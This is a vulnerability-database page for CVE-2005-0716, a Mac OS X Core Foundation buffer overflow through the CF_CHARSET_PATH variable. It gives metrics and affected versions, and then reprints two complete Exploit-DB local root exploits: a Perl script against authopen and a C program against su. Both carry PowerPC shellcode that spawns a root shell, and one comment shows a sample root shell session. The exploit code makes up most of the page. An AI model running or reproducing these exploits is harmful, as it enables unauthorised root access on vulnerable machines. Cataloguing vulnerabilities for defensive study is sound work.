CVE-2005-0716 : Detail

CVE-2005-0716

0.2%V4
Local
2005-03-22 04h00 +00:00
2006-08-10 07h00 +00:00

CVE Descriptions

Stack-based buffer overflow in the Core Foundation Library in Mac OS X 10.3.5 and 10.3.6, and possibly earlier versions, allows local users to execute arbitrary code via a long CF_CHARSET_PATH environment variable.

CVE Information

Metrics

Metrics | Score | Severity | CVSS Vector                  | Source
V2      | 7.2   |          | AV:L/AC:L/Au:N/C:C/I:C/A:C   | nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs; the percentile therefore lets you compare one CVE's EPSS score against the rest.

Exploit information

Exploit Database EDB-ID : 2111

Publication date : 2006-08-01 22h00 +00:00
Author : Kevin Finisterre
EDB Verified : Yes

#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Variant of CF_CHARSET_PATH a local root exploit by v9_at_fakehalo.us
#
# I was in the mood for some retro shit this morning, and I need root on some old ass G3 iMacs for a demo.
#
# I got sick of pressing enter on v9's exploit. It gets in the way when scripting attacks.
#
# Jill-Does-Computer:/tmp jilldoe$ ./authopen-CF_CHARSET.pl 0
# *** Target: 10.3.7 Build 7T65 on PowerPC, Padding: 1
# sh-2.05b# id
# uid=502(jilldoe) euid=0(root) gid=502(jilldoe) groups=502(jilldoe), 79(appserverusr), 80(admin), 81(appserveradm)
#
#

foreach $key (keys %ENV) { delete $ENV{$key}; }

#// ppc execve() code by b-r00t + nemo to add seteuid(0)
$sc =
    "\x7c\x63\x1a\x79" .
    "\x40\x82\xff\xfd" .
    "\x39\x40\x01\xc3" .
    "\x38\x0a\xfe\xf4" .
    "\x44\xff\xff\x02" .
    "\x39\x40\x01\x23" .
    "\x38\x0a\xfe\xf4" .
    "\x44\xff\xff\x02" .
    "\x60\x60\x60\x60" .
    "\x7c\xa5\x2a\x79" .
    "\x40\x82\xff\xfd" .
    "\x7d\x68\x02\xa6" .
    "\x3b\xeb\x01\x70" .
    "\x39\x40\x01\x70\x39\x1f\xfe\xcf" .
    "\x7c\xa8\x29\xae\x38\x7f\xfe\xc8" .
    "\x90\x61\xff\xf8\x90\xa1\xff\xfc" .
    "\x38\x81\xff\xf8\x38\x0a\xfe\xcb" .
    "\x44\xff\xff\x02\x7c\xa3\x2b\x78" .
    "\x38\x0a\xfe\x91\x44\xff\xff\x02" .
    "\x2f\x62\x69\x6e\x2f\x73\x68\x58";

$tgts{"0"} = "10.3.7 Build 7T65 on PowerPC:1";
$tgts{"1"} = "10.3.7 debug 0x41424344:0";

unless (($target) = @ARGV) {
    print "\n\nUsage: $0 <target> \n\nTargets:\n\n";
    foreach $key (sort(keys %tgts)) {
        ($a,$b) = split(/\:/,$tgts{"$key"});
        print "\t$key . $a\n";
    }
    print "\n";
    exit 1;
}

$ret = pack("l", ($retval));
($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a, Padding: $b\n";

# add a wrapper here if you want more than euid=0
open(SUSH,">/tmp/sh");
printf SUSH "/bin/csh -i\n";

$ENV{"CF_CHARSET_PATH"} = "A" x 1048 . pack('l', 0xbffffef6) x 2;
$ENV{"APPL"} = "." x $b . "iiii" x 40 . $sc ;

system("/usr/libexec/authopen /etc/master.passwd");

# milw0rm.com [2006-08-02]

Exploit Database EDB-ID : 896

Publication date : 2005-03-21 23h00 +00:00
Author : vade79
EDB Verified : Yes

/*[ MacOS X[CF_CHARSET_PATH]: local root exploit. ]*********
 *                                                         *
 * by: v9@fakehalo.us (fakehalo/realhalo)                  *
 *                                                         *
 * found by: iDefense (anon finder)                        *
 *                                                         *
 * saw the advisory on bugtraq and figured i'd slap this   *
 * together, so simple i had to. exploits via the          *
 * /usr/bin/su binary. you must press ENTER at the         *
 * "Password: " prompt.                                    *
 ***********************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

static char exec[]= /* b-r00t's setuid(0)+exec(/bin/sh). */
"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x7d\x68\x02\xa6\x3b\xeb"
"\x01\x70\x39\x40\x01\x70\x39\x1f\xfe\xdf\x7c\x68\x19\xae"
"\x38\x0a\xfe\xa7\x44\xff\xff\x02\x60\x60\x60\x60\x7c\xa5"
"\x2a\x79\x38\x7f\xfe\xd8\x90\x61\xff\xf8\x90\xa1\xff\xfc"
"\x38\x81\xff\xf8\x38\x0a\xfe\xcb\x44\xff\xff\x02\x7c\xa3"
"\x2b\x78\x38\x0a\xfe\x91\x44\xff\xff\x02\x2f\x62\x69\x6e"
"\x2f\x73\x68\x58";

int main(void){
  unsigned int i=0;
  char *buf,*env[3];
  printf("(*)MacOS X[CF_CHARSET_PATH]: local root exploit.\n");
  printf("(*)by: v9@fakehalo.us, found by iDefense adv. (anon)\n\n");
  if(!(buf=(char *)malloc(1100+1)))exit(1);
  memcpy(buf,"CF_CHARSET_PATH=",16);
  printf("[*] setting up the environment.\n");
  for(i=16;i<1100;i+=4)*(long *)&buf[i]=(0xbffffffa-strlen(exec));
  env[0]=buf;
  env[1]=exec;
  env[2]=NULL;
  printf("[*] executing su... (press ENTER at the \"Password: \""
  " prompt)\n\n");
  if(execle("/usr/bin/su","su",0,env))
    printf("[!] failed executing /usr/bin/su.\n");
  exit(0);
}

// milw0rm.com [2005-03-22]

Products Mentioned

Configuration 0

Apple>>Mac_os_x >> Version 10.3

Apple>>Mac_os_x >> Version 10.3.1

Apple>>Mac_os_x >> Version 10.3.2

Apple>>Mac_os_x >> Version 10.3.3

Apple>>Mac_os_x >> Version 10.3.4

Apple>>Mac_os_x >> Version 10.3.5

Apple>>Mac_os_x >> Version 10.3.6

Apple>>Mac_os_x >> Version 10.3.7

Apple>>Mac_os_x >> Version 10.3.8

Apple>>Mac_os_x_server >> Version 10.3

Apple>>Mac_os_x_server >> Version 10.3.1

Apple>>Mac_os_x_server >> Version 10.3.2

Apple>>Mac_os_x_server >> Version 10.3.3

Apple>>Mac_os_x_server >> Version 10.3.4

Apple>>Mac_os_x_server >> Version 10.3.5

Apple>>Mac_os_x_server >> Version 10.3.6

References

http://www.securityfocus.com/bid/13224
Tags : vdb-entry, x_refsource_BID